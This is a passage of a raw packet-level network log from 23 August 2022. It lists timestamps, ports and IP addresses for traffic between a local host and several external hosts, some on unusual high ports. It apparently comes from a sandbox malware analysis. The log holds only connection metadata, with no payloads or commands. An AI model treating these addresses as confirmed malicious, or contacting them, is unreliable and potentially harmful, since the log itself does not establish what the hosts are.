Aug 23, 2022 18:25:30.286067009 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.286087990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.286369085 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.286951065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.286978006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.287017107 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.287035942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.287058115 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.287079096 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.287097931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.287120104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.287139893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.287161112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.287414074 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.288264990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288297892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288328886 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288383007 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288389921 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.288408041 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288430929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288453102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288479090 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288506031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288531065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288558006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288585901 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288609028 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288631916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288661003 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288687944 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288710117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288733006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288755894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288778067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288800001 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288824081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288845062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288867950 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288892031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288918972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288944960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.288971901 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289000034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289027929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289053917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289079905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289109945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289136887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289159060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289180994 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289210081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289237976 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289263964 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289294004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289325953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289354086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289381981 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289410114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289434910 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289465904 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289496899 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289524078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289550066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289577961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289604902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289628029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289649010 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289669991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289697886 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289705038 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.289724112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289747953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289776087 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289800882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289827108 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289855957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289879084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289902925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289932966 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289963961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.289988995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290016890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290045977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290071011 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290096045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290122986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290153027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290182114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290209055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290234089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290256977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290282965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290302992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290327072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290353060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290354967 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.290375948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290400982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290419102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290436983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290456057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290474892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290493965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290540934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290560007 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290580034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290602922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290625095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290647030 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290668964 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290693045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290719032 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290744066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290776968 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290812016 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290848017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290884972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290920973 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290955067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.290988922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.291022062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.291049004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.291074991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.291101933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.291142941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.291182995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.291213036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.291341066 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.292402983 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.292723894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.292953014 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293014050 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293091059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293113947 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293163061 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293200970 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293262959 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293333054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293334961 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293364048 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293386936 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293411016 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293412924 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293447971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293478966 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293553114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293577909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293602943 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293602943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293631077 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293684006 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293684959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293704033 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293709993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293747902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293766975 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.293781042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.293812037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.294348955 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.771855116 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.772414923 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:37.157099962 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:25:37.473172903 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:25:37.473437071 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:25:41.436990023 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:25:41.752818108 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:25:41.891459942 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:25:49.089162111 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:49.089283943 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:49.128144026 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.128174067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.128192902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.128211975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.128230095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.128305912 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:49.128371000 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:49.165898085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.165982008 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.166094065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.166300058 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.166414022 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.166430950 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.166449070 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.166465044 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.248578072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:49.248697042 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:51.173819065 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:25:51.488955021 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:25:51.602520943 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:25:59.276181936 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:25:59.276196003 CEST	443	49872	216.58.209.35	192.168.2.3
Aug 23, 2022 18:26:14.410907030 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:14.477291107 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:14.477418900 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:14.990371943 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:15.308192015 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:15.308226109 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:15.308300972 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:15.308350086 CEST	34589	49952	103.89.90.61	192.168.2.3
Aug 23, 2022 18:26:15.395212889 CEST	49952	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 18:26:17.412378073 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:17.478905916 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:17.606173992 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:18.701683998 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:26:18.920766115 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:18.988995075 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:19.105650902 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:24.051110983 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:24.118015051 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:24.118041992 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:24.118058920 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:24.121874094 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:24.195151091 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:25.838888884 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:25.905670881 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:26.094957113 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:26.226324081 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:26.293561935 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:26.297435999 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:26.363580942 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:26.497658014 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:26.863646030 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:26.930537939 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:26.940094948 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:27.005141020 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:27.005508900 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:27.017791033 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:27.078835011 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:27.079003096 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:27.195530891 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:27.537470102 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:27.602509022 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:27.602689028 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:27.605130911 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:27.672399998 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:27.771112919 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:27.838253975 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:27.866837025 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:27.934678078 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:27.996988058 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.070419073 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.140211105 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.155565023 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.222702980 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.226469040 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.294097900 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.296040058 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.361639977 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.477688074 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.544982910 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545027018 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545073032 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545111895 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545131922 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545133114 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.545154095 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545175076 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545182943 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.545193911 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545202017 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.545208931 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.545217037 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545238972 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545258999 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545278072 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545298100 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545315981 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.545329094 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.545346975 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.545361996 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.610693932 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.610713959 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.610770941 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.610889912 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.610927105 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.610944986 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.610980988 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.610997915 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.611015081 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.611031055 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.611073971 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.611089945 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.611100912 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.611114025 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.611130953 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.611177921 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.611193895 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.611232042 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.611289978 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:28.809457064 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:28.874237061 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:29.195889950 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:29.262557983 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:29.263127089 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:29.306360960 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:29.371524096 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:29.493882895 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:29.556509972 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:29.557838917 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:29.616714001 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:29.617268085 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:29.692069054 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:29.693317890 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:29.770833969 CEST	16525	49994	195.54.170.157	192.168.2.3
Aug 23, 2022 18:26:29.782937050 CEST	49994	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 18:26:30.386190891 CEST	50013	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.386245966 CEST	443	50013	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.386393070 CEST	50013	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.387370110 CEST	50014	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.387432098 CEST	443	50014	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.387541056 CEST	50014	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.387759924 CEST	50013	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.387799025 CEST	443	50013	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.388178110 CEST	50014	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.388191938 CEST	443	50014	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.433207989 CEST	443	50014	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.434523106 CEST	443	50013	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.574147940 CEST	50014	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.596095085 CEST	50013	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.675945044 CEST	50013	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.676000118 CEST	443	50013	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.676173925 CEST	50014	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.676237106 CEST	443	50014	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.677405119 CEST	443	50014	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.677424908 CEST	443	50014	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.677505970 CEST	50014	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:26:30.677692890 CEST	443	50013	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.677715063 CEST	443	50013	8.8.8.8	192.168.2.3
Aug 23, 2022 18:26:30.677788973 CEST	50013	443	192.168.2.3	8.8.8.8
